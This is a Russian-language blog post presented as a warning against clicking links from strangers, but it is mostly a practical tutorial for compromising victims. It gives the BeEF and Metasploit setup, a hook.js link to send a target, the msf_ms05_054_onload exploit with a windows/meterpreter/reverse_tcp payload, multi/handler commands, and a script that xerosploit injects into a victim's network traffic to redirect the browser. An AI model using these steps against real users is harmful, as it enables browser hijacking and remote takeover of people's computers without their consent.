Опасность перехода по неизвестным URL.

Опасность перехода по неизвестным URL.

Life-Hack

Приветствую друзья! Сегодня мы поговорим о всей опасности перехода по URL от неизвестных лиц. Также будет много практики. Надеюсь вам будет интересно. Приступим!


Введение.

Каждый раз когда вы переходите по ссылке от неизвестного вам человека, задумывались ли вы о всей опасности того что вы сделали?

Переходя по ссылке вы можете не подозревать, но на вашем устройстве после перехода могут находится вредоносные программы а ваши персональные данные могут быть похищены. Сегодня мы на примерах убедимся во всей опасности...

  • Первое что может случится при переходе по ссылке это то, что злоумышленник получат доступ к вашим аккаунтам социальных сетей.

(Данный метод мы затрагивать не будем. Он был описан мной в цикле статей - Получение доступа к аккаунтам социальных сетей.)

  • Могут узнать ваш IP. И если вы думаете что это не страшно, то вы глубоко ошибаетесь.
  • Подгрузить малварь используя exploit pack.

На мой взгляд, это самое серьезное что может произойти. Ну что, меньше теории больше практики)


Подгружаем малварь.

Exploit pack - это своеобразная связка эксплойтов.

К при большому сожалению я не буду показывать в этой теме использование exploit pack'а. По той простой причине, что огонь это не игрушка. Но мы все равно завладеем всем устройством пользователя когда он перейдет по ссылке. А поможет нам сегодня beef в связке с metasploit. Этот способ я придумал совсем недавно.

Beef - это фреймворк для проведения XSS атак путем заражения и дальнейшего использования.
Metasploit - фреймворк для поиска и эксплоутации уязвимостей. То есть для проветения тестирования на проникновение.

Запуск beef.


В терминале пишем:

beef-xss

Переходим по ссылке:

http://127.0.0.1:3000/ui/authentication


Теперь нужно авторизироватся. Логин и пароль по умолчанию beef:beef.

Нам нужно чтобы "жертва" выполнила у себя скрипт hook.js

Нужно подгрузить его ей.

http://<ваш ip>:3000/demos/basic.html

Далее сократите ссылку и скиньте пользователю. Как только он переходит по ссылке на панели управления beef в разделе Online browsers появится активный браузер. Это браузер нашего пользователя.

Половина дел сделано. Теперь подключим к нашей работе metasploit. Для этого:

  1. Открываем файл config.yaml у beef. Часто он находится в этой дериктории - /usr/share/beef-xss/
  2. Ищем там раздел extension. У metasploit меняем значение параметра на true

3. Теперь же открываем файл /usr/share/beef-xss/extensions/metasploit/config.yaml и изменяем значение параметров у callback_host и host.

4. Запускаем metasploit и пишем следующее

msf> load msgrpc

И снова открываем файл из пункта 3. В pass вписываем получившийся с генерированный пароль. Остается сохранить.

Переходим в /usr/share/beef-xss/ и пишем

./beef -x

После этого в beef загрузятся exploit'ы.

Теперь нам доступны exploit'ы которые мы тоже подгрузить пользователю и выполнить их. Для начала я хотел бы узнать какая ОС у моего пользователя.

И как видно на скриншоте - это windows.

Теперь переходим во вкладку Commands и ищем - msf_ms05_054_onload

Выберем payload. Так как у моей "жертвы" windows я выбрал - windows/meterpreter/reverse_tcp

Заполняем все поля.

Теперь открываем msf и пишем

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <your_ip>
exploit

о второй команде пишете название пайлоада который выбрали в beef. Вот и все)

А пользователь всего-то перешел по ссылке.

А что если пользователь придерживается правил "я по незнакомым ссылкам не хожу"? На этот случай у нас имеется еще один ответ. Создаем файл hack.js с таким содержимым:

<script>
document.location.href="http://<your ip>:3000/demos/basic.html";
</script>

Запускаем xerosploit. И выбираем:

scan --> ip жертвы --> injectjs --> run --> путь до hack.js

Далее проделываем выше описанное.Вот так мы взломали не о чем не подозревающего пользователя. Будьте осторожны друзья)


Вывод

Не стоит переходить по ссылкам от незнакомцев, это может нанести критический вред вашему устройству. А представьте себе если залить hook.js на уязвимый к xss веб ресурс? Последствия просто ужасны. Надеюсь вам понравилась данная статья! Источник